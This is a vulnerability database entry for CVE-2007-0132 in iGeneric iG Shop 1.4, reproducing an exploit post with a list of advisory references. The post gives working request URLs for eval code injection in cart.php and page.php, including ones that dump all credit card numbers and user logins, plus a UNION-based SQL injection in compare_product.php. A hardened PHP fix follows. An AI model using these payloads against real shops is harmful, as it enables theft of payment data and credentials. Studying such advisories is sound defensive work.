IGeneric IG Shop SQL Injection Vulnerability

Vulnerability ID: 1111950
Vulnerability type: SQL injection
Published: 2007-01-05
Updated: 2007-01-10
CVE ID: CVE-2007-0132
CNNVD ID: CNNVD-200701-082
Platform: PHP
CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/3083
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-082
|Vulnerability Details
A SQL injection vulnerability exists in compare_product.php in iGeneric iG Shop 1.4. A remote attacker can execute arbitrary SQL commands via the id parameter.
|Vulnerability EXP
"If eval is the answer, then you are asking the wrong question."
--Unknown

ig-shop suffers from two evals that can be controlled by an attacker:
http://127.0.0.1/ig_shop/cart.php?action=;phpinfo();//
./cart.php line 692:
eval ("cart_$action();");

http://127.0.0.1/ig_shop/page.php?action=;phpinfo();//
./page.php line 336:
eval ("page_$action();");

Dumps all credit card numbers:
http://127.0.0.1/ig_shop/cart.php?action=;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20orders
Some of these variables can be decoded using the unserialize() function.

Dumps all logins:
http://127.0.0.1/ig_shop/cart.php?action=;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20users

SQL injection works regardless of magic_quotes_gpc.
http://127.0.0.1/ig_shop/compare_product.php?id=1%20union%20select%201
./compare_product.php line 11:
$qry_txt="select type_id from catalog_product where product_id=".$HTTP_GET_VARS[id];
Should have used quote marks.

Vendor's page: http://www.igeneric.co.uk/

By Michael Brooks.

# milw0rm.com [2007-01-05]
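The two defects the advisory above points at (an integer id concatenated straight into SQL text at compare_product.php line 11, and eval("cart_$action();") in cart.php and page.php) share one fix shape: request data must never become part of SQL or PHP code. The following is an added example, not iG Shop's own code; the function names, the PDO connection and the allow-list entries are assumptions.

```php
<?php
// Added example (not iG Shop's own code): hardened replacements for the two
// patterns in the advisory. Names, PDO handle and allow-list are assumptions.
declare(strict_types=1);

// compare_product.php line 11 built the query by string concatenation:
//   "... where product_id=" . $HTTP_GET_VARS[id]
// Quoting the value alone would not be a complete fix (the advisory notes
// the injection works regardless of magic_quotes_gpc). Bind it instead.
function lookupProductType(PDO $db, string $rawId): ?int
{
    // product_id is an integer column: reject anything that is not a
    // plain decimal before it gets anywhere near the query.
    if (!preg_match('/^[0-9]{1,10}$/', $rawId)) {
        return null;
    }
    $stmt = $db->prepare(
        'SELECT type_id FROM catalog_product WHERE product_id = :id'
    );
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : (int) $row['type_id'];
}

// cart.php line 692 and page.php line 336 did eval("cart_$action();").
// Dispatch through a fixed allow-list of handlers instead: the request
// value selects a key, it never becomes code.
const CART_ACTIONS = [
    'view'   => 'cart_view',
    'add'    => 'cart_add',
    'remove' => 'cart_remove',
];

function dispatchCartAction(string $action): void
{
    if (!array_key_exists($action, CART_ACTIONS)) {
        http_response_code(400);
        exit('unknown cart action');
    }
    // The value looked up is one of our own constant strings, so the
    // call cannot reach an attacker-chosen function.
    $handler = CART_ACTIONS[$action];
    $handler();
}

// Usage (hypothetical handlers cart_view/cart_add/cart_remove defined elsewhere):
// $type = lookupProductType($db, $_GET['id'] ?? '');
// dispatchCartAction($_GET['action'] ?? 'view');
```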
|References

Source: MILW0RM
Name: 3083
Link: http://www.milw0rm.com/exploits/3083
Source: VUPEN
Name: ADV-2007-0056
Link: http://www.frsirt.com/english/advisories/2007/0056
Source: SECUNIA
Name: 23604
Link: http://secunia.com/advisories/23604
Source: MISC
Link: http://packetstormsecurity.nl/0701-exploits/igshop10-multiple.txt
Source: OSVDB
Name: 33385
Link: http://osvdb.org/33385
Source: XF
Name: igshop-compareproduct-sql-injection(31299)
Link: http://xforce.iss.net/xforce/xfdb/31299
Source: BID
Name: 21874
Link: http://www.securityfocus.com/bid/21874
Source: BUGTRAQ
Name: 20070105 IG Shop remote code execution
Link: http://www.securityfocus.com/archive/1/archive/1/456043/100/0/threaded
Source: MILW0RM
Name: 3083
Link: http://milw0rm.com/exploits/3083